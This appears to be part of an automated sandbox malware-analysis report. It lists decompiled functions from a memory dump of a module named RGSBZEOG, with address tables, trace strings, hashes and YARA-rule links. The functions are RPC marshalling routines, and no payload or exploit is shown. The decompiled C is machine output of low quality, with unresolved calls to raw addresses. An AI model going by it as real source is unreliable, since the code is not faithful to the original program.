                                                                                              0x6f709a2c
                                                                                              0x6f709a2e
                                                                                              0x6f709a34
                                                                                              0x6f709a38
                                                                                              0x6f709a3d
                                                                                              0x6f709a40
                                                                                              0x6f709a43
                                                                                              0x6f709a46
                                                                                              0x6f709a49
                                                                                              0x6f709a50
                                                                                              0x6f709a57
                                                                                              0x6f709a8a
                                                                                              0x6f709a8d
                                                                                              0x6f709a90
                                                                                              0x6f709a91
                                                                                              0x6f709a96
                                                                                              0x6f709a9b
                                                                                              0x6f709a59
                                                                                              0x6f709a59
                                                                                              0x6f709a5c
                                                                                              0x6f709a62
                                                                                              0x6f709a77
                                                                                              0x6f709a79
                                                                                              0x6f709a7c
                                                                                              0x6f709a7d
                                                                                              0x6f709a80
                                                                                              0x6f709a81
                                                                                              0x6f709a84
                                                                                              0x6f709a85
                                                                                              0x6f709a64
                                                                                              0x6f709a64
                                                                                              0x6f709a66
                                                                                              0x6f709a69
                                                                                              0x6f709a6a
                                                                                              0x6f709a6d
                                                                                              0x6f709a6e
                                                                                              0x6f709a71
                                                                                              0x6f709a72
                                                                                              0x6f709a72
                                                                                              0x6f709a88
                                                                                              0x6f709a9e
                                                                                              0x6f709aa1
                                                                                              0x6f709aa4
                                                                                              0x6f709aaa
                                                                                              0x6f709aad
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709ab5
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f7096a8
                                                                                              0x6f7096aa
                                                                                              0x6f7096b2
                                                                                              0x6f7096ba
                                                                                              0x6f7096bd
                                                                                              0x6f7096c0
                                                                                              0x6f7096c2
                                                                                              0x6f7096c5
                                                                                              0x6f7096c6
                                                                                              0x6f7096c9
                                                                                              0x6f7096cb
                                                                                              0x6f7096cc
                                                                                              0x6f7096d1
                                                                                              0x6f7096d6
                                                                                              0x6f7096dc
                                                                                              0x6f7096df
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f7096e7
                                                                                              0x6f7096e9
                                                                                              0x6f7096ed
                                                                                              0x6f7096f9
                                                                                              0x6f7096fc
                                                                                              0x6f7096ff
                                                                                              0x6f709701
                                                                                              0x6f709704
                                                                                              0x6f709705
                                                                                              0x6f709708
                                                                                              0x6f70970a
                                                                                              0x6f70970b
                                                                                              0x6f709710
                                                                                              0x6f709715
                                                                                              0x6f70971b
                                                                                              0x6f70971e
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7095a4
                                                                                              0x6f709adf
                                                                                              0x6f709adf
                                                                                              0x6f709acb

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$p<po$pointer => %p$short=%d => %p
                                                                                              • API String ID: 2102423945-1117049768
                                                                                              • Opcode ID: 97a231d21420f43f7729c450aa766a1ded4889bf0a6ef5eb19cc5326961b59c0
                                                                                              • Instruction ID: 903cd941327a6577c14f1d89d4ccfe07ab2afd7da77dfa6686bc540a21c1484b
                                                                                              • Opcode Fuzzy Hash: 97a231d21420f43f7729c450aa766a1ded4889bf0a6ef5eb19cc5326961b59c0
                                                                                              • Instruction Fuzzy Hash: 8FC11CF5A00209AFDB04DF54DA90EAA77B5BF99314F04C169F9198F385D731EA50CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F703840, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 212COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 37%
                                                                                              			E6F703840(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				signed char* _v8;
				signed char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr* _t124;
				void* _t126;
				intOrPtr _t129;
				void* _t134;
				void* _t198;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t204;

				_v8 = _a12;
				0x6f700000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t201 = _t200 + 0x14;
				_a12 = _a12 + 6;
				if(( *_v8 & 0x000000ff) == 0x19) {
					_v12 =  &(_v8[_v8[4] + 4]);
					_v28 = E6F70D650( *_v12 & 0x000000ff, _a4, _v12);
					E6F7073D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					0x6f700000("memory_size = %d\n", _v8[2] & 0x0000ffff);
					_t204 = _t201 + 0x1c;
					if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
						_a16 = 1;
					}
					if((_a16 & 0x000000ff) != 0) {
						_v32 = (_v8[2] & 0x0000ffff) + _v28;
						_t129 = E6F70A3B0(_v32, _a4, _v32);
						_t204 = _t204 + 8;
						 *_a8 = _t129;
					}
					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
					_v16 =  *((intOrPtr*)(_a4 + 0x10));
					E6F70AF00(_a4, _v8[2] & 0x0000ffff);
					_v36 = (_v8[2] & 0x0000ffff) +  *_a8;
					_v20 = E6F70D830(_t134, _t198, _t199,  *_v12 & 0x000000ff, _a4,  &_v36, _v12, 0, 0, 0);
					_v40 =  *((intOrPtr*)(_a4 + 0x40));
					_v24 =  *((intOrPtr*)(_a4 + 4));
					E6F70AF00(_a4, _v20);
					E6F70C2B0(_a4, _v16,  *_a8, _a12, _a16 & 0x000000ff);
					E6F7100E0( *_a8, _v16, _v8[2] & 0x0000ffff);
					0x6f700000("copying %p to %p\n", _v24, (_v8[2] & 0x0000ffff) +  *_a8);
					E6F7100E0( *_a8 + (_v8[2] & 0x0000ffff) + _v40, _v24, _v20);
					if(( *_v12 & 0x000000ff) != 0x22) {
						if(( *_v12 & 0x000000ff) == 0x25) {
							_t124 = _a8;
							0x6f700000((_v8[2] & 0x0000ffff) +  *_t124);
							0x6f700000("string=%s\n", _t124);
						}
					} else {
						_t126 = (_v8[2] & 0x0000ffff) +  *_a8;
						0x6f700000(_t126);
						0x6f700000("string=%s\n", _t126);
					}
					return 0;
				}
				0x6f700000("invalid format type %x\n",  *_v8 & 0x000000ff);
				 *0x6f700000(0x6e6);
				return 0;
			}





















                                                                                              0x6f703849
                                                                                              0x6f703862
                                                                                              0x6f703867
                                                                                              0x6f703870
                                                                                              0x6f70387c
                                                                                              0x6f7038b2
                                                                                              0x6f7038cc
                                                                                              0x6f7038e1
                                                                                              0x6f7038f6
                                                                                              0x6f7038fb
                                                                                              0x6f703904
                                                                                              0x6f70390e
                                                                                              0x6f70390e
                                                                                              0x6f703918
                                                                                              0x6f703924
                                                                                              0x6f70392f
                                                                                              0x6f703934
                                                                                              0x6f70393a
                                                                                              0x6f70393a
                                                                                              0x6f703945
                                                                                              0x6f70394e
                                                                                              0x6f70395d
                                                                                              0x6f703971
                                                                                              0x6f703995
                                                                                              0x6f70399e
                                                                                              0x6f7039a7
                                                                                              0x6f7039b2
                                                                                              0x6f7039d1
                                                                                              0x6f7039eb
                                                                                              0x6f703a09
                                                                                              0x6f703a2b
                                                                                              0x6f703a3c
                                                                                              0x6f703a6c
                                                                                              0x6f703a75
                                                                                              0x6f703a7b
                                                                                              0x6f703a89
                                                                                              0x6f703a8e
                                                                                              0x6f703a3e
                                                                                              0x6f703a48
                                                                                              0x6f703a4b
                                                                                              0x6f703a59
                                                                                              0x6f703a5e
                                                                                              0x00000000
                                                                                              0x6f703a91
                                                                                              0x6f70388a
                                                                                              0x6f703897
                                                                                              0x00000000

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (%p, %p, %p, %d)$copying %p to %p$invalid format type %x$memory_size = %d$string=%s$string=%s
                                                                                              • API String ID: 0-4074488482
                                                                                              • Opcode ID: 4fb196c9b8c61470dffb2ac1418f2f9327a9efbc37800639119e17da8c3afebb
                                                                                              • Instruction ID: 587929ce94ee4d7021ae4766fdcdf9874cf5629e303050f0600837f5d62d6d29
                                                                                              • Opcode Fuzzy Hash: 4fb196c9b8c61470dffb2ac1418f2f9327a9efbc37800639119e17da8c3afebb
                                                                                              • Instruction Fuzzy Hash: E2814BF5A00208AFCB04DF98D981EAEB7F5BF88305F148199F8499B345D734EA50DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F703600, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 193COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 29%
                                                                                              			E6F703600(intOrPtr _a4, signed int* _a8, signed char* _a12, signed int _a16) {
				signed char* _v8;
				intOrPtr _v12;
				signed char* _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _t94;
				intOrPtr _t98;
				signed int _t115;
				signed char* _t135;
				signed char* _t163;
				void* _t181;
				void* _t182;
				void* _t186;
				void* _t187;

				_v8 = _a12;
				0x6f700000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t182 = _t181 + 0x14;
				_a12 = _a12 + 6;
				if(( *_v8 & 0x000000ff) != 0x18 && ( *_v8 & 0x000000ff) != 0x17) {
					0x6f700000("invalid format type %x\n",  *_v8 & 0x000000ff);
					 *0x6f700000(0x6e6);
					return 0;
				}
				_v16 =  &(_v8[_v8[4] + 4]);
				__eflags = ( *_v16 & 0x000000ff) - 0x1b;
				if(__eflags == 0) {
					_v24 = _v16[2] & 0x0000ffff;
					_v16 = E6F70A460( &(_v16[4]), __eflags, _a4,  &(_v16[4]));
					E6F7073D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					0x6f700000("memory_size = %d\n", _v8[2] & 0x0000ffff);
					_t94 = E6F70AEC0(_v24,  *((intOrPtr*)(_a4 + 0x3c)));
					_t186 = _t182 + 0x20;
					_v12 = _t94;
					_t163 = _v8;
					_t135 = _v8;
					__eflags = ( *(_t163 + 2) & 0x0000ffff) + _v12 - ( *(_t135 + 2) & 0x0000ffff);
					if(( *(_t163 + 2) & 0x0000ffff) + _v12 < ( *(_t135 + 2) & 0x0000ffff)) {
						0x6f700000("integer overflow of memory_size %u with bufsize %u\n", _v8[2] & 0x0000ffff, _v12);
						_t186 = _t186 + 0xc;
						 *0x6f700000(0x6f7);
					}
					__eflags = _a16 & 0x000000ff;
					if((_a16 & 0x000000ff) == 0) {
						_t98 = _a4;
						__eflags =  *(_t98 + 0x20) & 0x000000ff;
						if(( *(_t98 + 0x20) & 0x000000ff) == 0) {
							__eflags =  *_a8;
							if( *_a8 == 0) {
								 *_a8 =  *(_a4 + 4);
							}
						}
					} else {
						_v28 = (_v8[2] & 0x0000ffff) + _v12;
						_t115 = E6F70A3B0(_a4, _a4, _v28);
						_t186 = _t186 + 8;
						 *_a8 = _t115;
					}
					 *(_a4 + 0x10) =  *(_a4 + 4);
					_v20 =  *(_a4 + 0x10);
					E6F70AF00(_a4, (_v8[2] & 0x0000ffff) + _v12);
					_t187 = _t186 + 8;
					__eflags = ( *_v8 & 0x000000ff) - 0x18;
					if(( *_v8 & 0x000000ff) == 0x18) {
						E6F70C2B0(_a4, _v20,  *_a8, _a12, _a16 & 0x000000ff);
						_t187 = _t187 + 0x14;
					}
					0x6f700000("copying %p to %p\n", _v20,  *_a8);
					__eflags =  *_a8 - _v20;
					if( *_a8 != _v20) {
						__eflags = (_v8[2] & 0x0000ffff) + _v12;
						E6F7100E0( *_a8, _v20, (_v8[2] & 0x0000ffff) + _v12);
					}
					__eflags = 0;
					return 0;
				} else {
					0x6f700000("invalid array format type %x\n",  *_v8 & 0x000000ff);
					 *0x6f700000(0x6e6);
					return 0;
				}
			}


















                                                                                              0x6f703609
                                                                                              0x6f703622
                                                                                              0x6f703627
                                                                                              0x6f703630
                                                                                              0x6f70363c
                                                                                              0x6f703655
                                                                                              0x6f703662
                                                                                              0x00000000
                                                                                              0x6f703668
                                                                                              0x6f70367d
                                                                                              0x6f703686
                                                                                              0x6f703689
                                                                                              0x6f7036b8
                                                                                              0x6f7036ce
                                                                                              0x6f7036e3
                                                                                              0x6f7036f8
                                                                                              0x6f70370b
                                                                                              0x6f703710
                                                                                              0x6f703713
                                                                                              0x6f703716
                                                                                              0x6f703720
                                                                                              0x6f703727
                                                                                              0x6f703729
                                                                                              0x6f70373c
                                                                                              0x6f703741
                                                                                              0x6f703749
                                                                                              0x6f703749
                                                                                              0x6f703753
                                                                                              0x6f703755
                                                                                              0x6f70377b
                                                                                              0x6f703782
                                                                                              0x6f703784
                                                                                              0x6f703789
                                                                                              0x6f70378c
                                                                                              0x6f703797
                                                                                              0x6f703797
                                                                                              0x6f70378c
                                                                                              0x6f703757
                                                                                              0x6f703761
                                                                                              0x6f70376c
                                                                                              0x6f703771
                                                                                              0x6f703777
                                                                                              0x6f703777
                                                                                              0x6f7037a2
                                                                                              0x6f7037ab
                                                                                              0x6f7037bd
                                                                                              0x6f7037c2
                                                                                              0x6f7037cb
                                                                                              0x6f7037ce
                                                                                              0x6f7037e7
                                                                                              0x6f7037ec
                                                                                              0x6f7037ec
                                                                                              0x6f7037fe
                                                                                              0x6f70380b
                                                                                              0x6f70380e
                                                                                              0x6f703817
                                                                                              0x6f703825
                                                                                              0x6f70382a
                                                                                              0x6f70382d
                                                                                              0x00000000
                                                                                              0x6f70368b
                                                                                              0x6f703697
                                                                                              0x6f7036a4
                                                                                              0x00000000
                                                                                              0x6f7036aa

                                                                                              Strings
                                                                                              • (%p, %p, %p, %d), xrefs: 6F70361D
                                                                                              • integer overflow of memory_size %u with bufsize %u, xrefs: 6F703737
                                                                                              • memory_size = %d, xrefs: 6F7036F3
                                                                                              • copying %p to %p, xrefs: 6F7037F9
                                                                                              • invalid format type %x, xrefs: 6F703650
                                                                                              • invalid array format type %x, xrefs: 6F703692
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (%p, %p, %p, %d)$copying %p to %p$integer overflow of memory_size %u with bufsize %u$invalid array format type %x$invalid format type %x$memory_size = %d
                                                                                              • API String ID: 0-1713900660
                                                                                              • Opcode ID: 6313d1e1b1ae0911d4c0cf20c0d576a1b40d81a55adbffdbea9c2d8fbb8f769e
                                                                                              • Instruction ID: a8c291c57fe89a896ec103c91c5adebffb738448362acca50218a44b0918344a
                                                                                              • Opcode Fuzzy Hash: 6313d1e1b1ae0911d4c0cf20c0d576a1b40d81a55adbffdbea9c2d8fbb8f769e
                                                                                              • Instruction Fuzzy Hash: 35716CB5A00108AFCB44DF98D991DAEBBF2BF89305F148199F8599B345D730EE50DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F708850, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 100COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 16%
                                                                                              			E6F708850(intOrPtr* _a4, intOrPtr* _a8, signed char* _a12, signed char _a16) {
				intOrPtr* _v8;
				char* _v12;
				intOrPtr _v16;
				signed char* _t49;
				signed char* _t76;
				void* _t87;
				void* _t88;

				if((_a16 & 0x000000ff) == 0) {
					_v12 = "FALSE";
				} else {
					_v12 = "TRUE";
				}
				0x6f700000("pStubMsg %p, ppMemory %p, pFormat %p, fMustAlloc %s\n", _a4, _a8, _a12, _v12);
				_t88 = _t87 + 0x14;
				if(( *_a12 & 0x000000ff) != 0x30) {
					0x6f700000("invalid format type %x\n",  *_a12 & 0x000000ff);
					_t88 = _t88 + 8;
					 *0x6f700000(0x6e6);
				}
				0x6f700000("flags: 0x%02x\n", _a12[1] & 0x000000ff);
				if(( *(_a4 + 0x20) & 0x000000ff) == 0) {
					_v16 = E6F704BC0(__eflags, _a4, _a12);
					_t76 = _a12;
					__eflags =  *(_t76 + (1 << 0)) & 0x80;
					if(( *(_t76 + (1 << 0)) & 0x80) == 0) {
						 *_a8 =  *((intOrPtr*)(_v16 + 8));
					} else {
						 *_a8 = _v16 + 8;
					}
				} else {
					if((_a12[1] & 0x80) == 0) {
						_v8 = _a8;
					} else {
						_v8 =  *_a8;
					}
					_t49 = _a12;
					_t94 = (_t49[1] & 0x60) - 0x20;
					if((_t49[1] & 0x60) == 0x20) {
						 *_v8 = 0;
					}
					E6F7049D0(_t94, _a4, _v8,  *((intOrPtr*)( *_a4)));
				}
				return 0;
			}










                                                                                              0x6f70885c
                                                                                              0x6f708867
                                                                                              0x6f70885e
                                                                                              0x6f70885e
                                                                                              0x6f70885e
                                                                                              0x6f708883
                                                                                              0x6f708888
                                                                                              0x6f708894
                                                                                              0x6f7088a2
                                                                                              0x6f7088a7
                                                                                              0x6f7088af
                                                                                              0x6f7088af
                                                                                              0x6f7088ca
                                                                                              0x6f7088db
                                                                                              0x6f708948
                                                                                              0x6f708953
                                                                                              0x6f70895a
                                                                                              0x6f70895f
                                                                                              0x6f708977
                                                                                              0x6f708961
                                                                                              0x6f70896a
                                                                                              0x6f70896a
                                                                                              0x6f7088dd
                                                                                              0x6f7088f2
                                                                                              0x6f708901
                                                                                              0x6f7088f4
                                                                                              0x6f7088f9
                                                                                              0x6f7088f9
                                                                                              0x6f70890c
                                                                                              0x6f708916
                                                                                              0x6f708919
                                                                                              0x6f70891e
                                                                                              0x6f70891e
                                                                                              0x6f708934
                                                                                              0x6f708934
                                                                                              0x6f70897e

                                                                                              APIs
                                                                                              • _NdrClientContextUnmarshall@12.RGSBZEOG(?,?,00000001), ref: 6F708934
                                                                                              • _NdrServerContextNewUnmarshall@8.RGSBZEOG(?,?), ref: 6F708943
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Context$ClientServerUnmarshall@12Unmarshall@8
                                                                                              • String ID: FALSE$TRUE$flags: 0x%02x$invalid format type %x$pStubMsg %p, ppMemory %p, pFormat %p, fMustAlloc %s
                                                                                              • API String ID: 4170269409-3585304320
                                                                                              • Opcode ID: 6610662d13564ef16fd2101ce1e43688208de129adfa57b87dd10f287e376360
                                                                                              • Instruction ID: abab234b44b245c3b276439a62035c71e8c863e267b4d7ce8e1d388c6fc8350b
                                                                                              • Opcode Fuzzy Hash: 6610662d13564ef16fd2101ce1e43688208de129adfa57b87dd10f287e376360
                                                                                              • Instruction Fuzzy Hash: 7B4183B56042889FDB04DF55C950FAE7BF1FF8A301F108169F8658B384C635EA50CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F701AD0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 162COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _NdrComplexArrayBufferSize@12.RGSBZEOG(?,?,?), ref: 6F701B9D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ArrayBufferComplexSize@12
                                                                                              • String ID: (%p,%p,%p)$buffer overflow %d bytes$buffer=%d/%d$difference = 0x%x$invalid format type %x
                                                                                              • API String ID: 3462415225-3633984987
                                                                                              • Opcode ID: c949ae040e626fc3577bc8516682a5f886fc54cbb74d8f04c22afcfd48f3f8ab
                                                                                              • Instruction ID: 291483899197efe0ea066f7196d8e520295e39e90493a31e2b006c5172923bb0
                                                                                              • Opcode Fuzzy Hash: c949ae040e626fc3577bc8516682a5f886fc54cbb74d8f04c22afcfd48f3f8ab
                                                                                              • Instruction Fuzzy Hash: 0571E8B8600209EFCB08DF58D594EAABBB1FF88354F15C158ED498B355D771EA81CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F701440, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 224COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 21%
                                                                                              			E6F701440(void* _a4, signed int* _a8, signed short* _a12) {
				signed char* _v8;
				signed char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t147;
				signed short* _t162;
				intOrPtr _t225;
				void* _t262;
				void* _t263;
				void* _t264;
				void* _t265;

				_v8 = 0;
				_v12 = 0;
				_v44 =  *((intOrPtr*)(_a4 + 0x1c));
				_v28 = 0;
				_v20 = 0;
				_v16 = 0;
				_v24 = 0;
				0x6f700000("(%p,%p,%p)\n", _a4, _a8, _a12);
				_t263 = _t262 + 0x10;
				_t225 = _a4;
				_t267 =  *((intOrPtr*)(_t225 + 0x34));
				if( *((intOrPtr*)(_t225 + 0x34)) == 0) {
					_v32 =  *((intOrPtr*)(_a4 + 0x30));
					_v36 =  *((intOrPtr*)(_a4 + 0x14));
					 *((intOrPtr*)(_a4 + 0x14)) =  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8));
					 *((intOrPtr*)(_a4 + 0x30)) = 1;
					E6F705070(_t267, _a4, _a8, _a12);
					 *((intOrPtr*)(_a4 + 0x30)) = _v32;
					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14));
					0x6f700000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x34)) -  *((intOrPtr*)(_a4 + 4)));
					_t263 = _t263 + 8;
					_v28 = 1;
					 *((intOrPtr*)(_a4 + 0x14)) = _v36;
				}
				E6F707400(_a4 + 4, _a4 + 4, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
				_t264 = _t263 + 8;
				_a12 =  &(_a12[2]);
				if( *_a12 != 0) {
					_v8 = _a12 +  *_a12;
				}
				_a12 =  &(_a12[1]);
				if(( *_a12 & 0x0000ffff) != 0) {
					_v12 = _a12 + ( *_a12 & 0x0000ffff);
				}
				_a12 =  &(_a12[1]);
				 *((intOrPtr*)(_a4 + 0x1c)) = _a8;
				if(_v8 != 0) {
					_t162 = _a12;
					0x6f700000(_a4, _t162);
					_v40 = _t162;
					E6F70D120( *_v8 & 0x000000ff, _a4, _a8 + _v40, _v8);
					_t264 = _t264 + 0x18;
					_v16 =  *((intOrPtr*)(_a4 + 0x3c));
					_v20 =  *((intOrPtr*)(_a4 + 0x44));
					_v24 =  *((intOrPtr*)(_a4 + 0x40));
				}
				_t147 = E6F708F30(_a4, _a8, _a12, _v12);
				_t265 = _t264 + 0x10;
				_a8 = _t147;
				if(_v8 != 0) {
					 *((intOrPtr*)(_a4 + 0x3c)) = _v16;
					 *((intOrPtr*)(_a4 + 0x44)) = _v20;
					 *((intOrPtr*)(_a4 + 0x40)) = _v24;
					E6F70D360( *_v8 & 0x000000ff, _a4, _a8, _v8, 1);
					_t265 = _t265 + 0x14;
				}
				 *((intOrPtr*)(_a4 + 0x1c)) = _v44;
				if(_v28 != 0) {
					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
					 *((intOrPtr*)(_a4 + 0x34)) = 0;
				}
				do {
					0x6f700000("buffer=%d/%d\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)),  *((intOrPtr*)(_a4 + 0x14)));
					_t265 = _t265 + 0xc;
					if( *((intOrPtr*)(_a4 + 4)) >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
						0x6f700000("buffer overflow %d bytes\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)));
						_t265 = _t265 + 8;
					}
				} while (0 != 0);
				return 0;
			}




















                                                                                              0x6f701446
                                                                                              0x6f70144d
                                                                                              0x6f70145a
                                                                                              0x6f70145d
                                                                                              0x6f701464
                                                                                              0x6f70146b
                                                                                              0x6f701472
                                                                                              0x6f70148a
                                                                                              0x6f70148f
                                                                                              0x6f701492
                                                                                              0x6f701495
                                                                                              0x6f701499
                                                                                              0x6f7014a5
                                                                                              0x6f7014ae
                                                                                              0x6f7014c2
                                                                                              0x6f7014c8
                                                                                              0x6f7014db
                                                                                              0x6f7014e6
                                                                                              0x6f7014fa
                                                                                              0x6f70150f
                                                                                              0x6f701514
                                                                                              0x6f701517
                                                                                              0x6f701524
                                                                                              0x6f701524
                                                                                              0x6f701541
                                                                                              0x6f701546
                                                                                              0x6f70154f
                                                                                              0x6f70155a
                                                                                              0x6f701565
                                                                                              0x6f701565
                                                                                              0x6f70156e
                                                                                              0x6f701579
                                                                                              0x6f701584
                                                                                              0x6f701584
                                                                                              0x6f70158d
                                                                                              0x6f701596
                                                                                              0x6f70159d
                                                                                              0x6f70159f
                                                                                              0x6f7015a7
                                                                                              0x6f7015af
                                                                                              0x6f7015d1
                                                                                              0x6f7015d6
                                                                                              0x6f7015df
                                                                                              0x6f7015e8
                                                                                              0x6f7015f1
                                                                                              0x6f7015f1
                                                                                              0x6f701604
                                                                                              0x6f701609
                                                                                              0x6f70160c
                                                                                              0x6f701613
                                                                                              0x6f70161b
                                                                                              0x6f701624
                                                                                              0x6f70162d
                                                                                              0x6f70164e
                                                                                              0x6f701653
                                                                                              0x6f701653
                                                                                              0x6f70165c
                                                                                              0x6f701663
                                                                                              0x6f70166e
                                                                                              0x6f701674
                                                                                              0x6f701674
                                                                                              0x6f70167b
                                                                                              0x6f701696
                                                                                              0x6f70169b
                                                                                              0x6f7016b2
                                                                                              0x6f7016d0
                                                                                              0x6f7016d5
                                                                                              0x6f7016d5
                                                                                              0x6f7016d8
                                                                                              0x6f7016e1

                                                                                              APIs
                                                                                              • _NdrComplexStructBufferSize@12.RGSBZEOG(00000000,00000000,00000000), ref: 6F7014DB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
